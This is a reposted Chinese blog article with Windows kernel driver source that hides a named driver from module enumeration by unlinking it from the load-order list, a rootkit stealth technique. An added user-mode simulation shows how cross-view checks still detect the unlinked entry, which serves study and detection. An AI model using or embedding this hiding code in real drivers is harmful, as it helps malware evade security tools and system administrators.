生活随笔
This article, collected and organized by 生活随笔, mainly introduces:
Hiding a driver module (source code)
The editor found it quite good and is sharing it here for reference.
Tested and working on XP: a driver-module enumeration routine written by ourselves will no longer see the hidden module. For enumerating driver modules, see the article http://blog.csdn.net/liujiayu2/article/details/72822478
However, ARK tools such as Kernel Detective and PCHunter can still see the driver module we hid, but they display the hidden module in red, meaning the ARK tool has detected that this module was hidden.
```c
#include <ntddk.h>

typedef unsigned long DWORD;

/* Partial layout of the loader's module entry (XP-era layout as given in the post). */
typedef struct _KLDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    PVOID ExceptionTable;
    ULONG ExceptionTableSize;
    PVOID GpValue;
    DWORD UnKnow;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT __Unused5;
    PVOID SectionPointer;
    ULONG CheckSum;
    PVOID LoadedImports;
    PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

PDRIVER_OBJECT pDriverObject = NULL;

VOID
HideDriver()
{
    /* DriverSection points at this driver's own entry in the load-order list. */
    PKLDR_DATA_TABLE_ENTRY entry = (PKLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection;
    PKLDR_DATA_TABLE_ENTRY firstentry;
    UNICODE_STRING uniDriverName;

    firstentry = entry;

    RtlInitUnicodeString(&uniDriverName, L"XueTr.sys");

    /* Walk the circular list starting from our own entry until we get back to it. */
    while ((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink != firstentry)
    {
        if (entry->FullDllName.Buffer != 0)
        {
            if (RtlCompareUnicodeString(&uniDriverName, &(entry->BaseDllName), FALSE) == 0)
            {
                KdPrint(("Hid driver %ws successfully!\n", entry->BaseDllName.Buffer));

                /* Unlink the entry from its neighbours (the original wrote the
                   predecessor's Flink through a DWORD cast, which only works on 32-bit). */
                entry->InLoadOrderLinks.Blink->Flink = entry->InLoadOrderLinks.Flink;
                entry->InLoadOrderLinks.Flink->Blink = entry->InLoadOrderLinks.Blink;

                /* Point the entry at itself so a later unlink does not corrupt the list. */
                entry->InLoadOrderLinks.Flink = &entry->InLoadOrderLinks;
                entry->InLoadOrderLinks.Blink = &entry->InLoadOrderLinks;

                break;
            }
        }

        entry = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
    }
}

/* DRIVER_UNLOAD callbacks return VOID; the original declared this as NTSTATUS. */
VOID
UnloadDriver(
    IN PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);
}

NTSTATUS
DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
    UNREFERENCED_PARAMETER(RegistryPath);

    DriverObject->DriverUnload = UnloadDriver;
    pDriverObject = DriverObject;
    HideDriver();
    return STATUS_SUCCESS;
}
```
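To show why cross-view ARK tools still flag the unlinked module in red, here is an added user-mode simulation (not part of the original post): it models the load-order list with simplified stand-in structs, performs the same unlink as HideDriver above, and then runs the kind of cross-view check such tools do, comparing a walk of the list against every entry that still exists in memory and also flagging the self-referential Flink/Blink pattern. The module names and struct layouts are constructed for the demo.

```c
#include <stddef.h>
#include <string.h>

/* Minimal stand-ins for LIST_ENTRY and the loader entry (constructed for this demo). */
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
typedef struct { LIST_ENTRY InLoadOrderLinks; const char *BaseDllName; } MODULE_ENTRY;

#define NMODS 4
static const char *g_names[NMODS] = { "ntoskrnl.exe", "hal.dll", "XueTr.sys", "tcpip.sys" };
static MODULE_ENTRY g_mods[NMODS];     /* "scan" view: every entry that exists in memory */
static LIST_ENTRY g_head;              /* stands in for the list head (PsLoadedModuleList) */

/* Link every entry into a circular doubly-linked list behind the head. */
void build_list(void) {
    g_head.Flink = g_head.Blink = &g_head;
    for (int i = 0; i < NMODS; i++) {
        LIST_ENTRY *e = &g_mods[i].InLoadOrderLinks;
        g_mods[i].BaseDllName = g_names[i];
        e->Blink = g_head.Blink; e->Flink = &g_head;
        g_head.Blink->Flink = e; g_head.Blink = e;
    }
}

/* The same unlink HideDriver performs, followed by pointing the entry at itself. */
void unlink_by_name(const char *name) {
    for (int i = 0; i < NMODS; i++) {
        LIST_ENTRY *e = &g_mods[i].InLoadOrderLinks;
        if (strcmp(g_mods[i].BaseDllName, name) != 0) continue;
        e->Blink->Flink = e->Flink;
        e->Flink->Blink = e->Blink;
        e->Flink = e->Blink = e;
    }
}

/* Cross-view check: an entry that exists in the scan view but is not reached by
   walking the list (or whose links point at itself) is reported as hidden.
   Returns the number of flagged entries and writes their names into out[]. */
int find_hidden(const char **out) {
    int hidden = 0;
    for (int i = 0; i < NMODS; i++) {
        LIST_ENTRY *e = &g_mods[i].InLoadOrderLinks;
        int reachable = 0;
        for (LIST_ENTRY *p = g_head.Flink; p != &g_head; p = p->Flink)
            if (p == e) { reachable = 1; break; }
        if (!reachable || e->Flink == e || e->Blink == e)
            out[hidden++] = g_mods[i].BaseDllName;
    }
    return hidden;
}
```

A real ARK tool obtains its second view differently (for example by scanning pool memory for entry structures), but the comparison logic is the same.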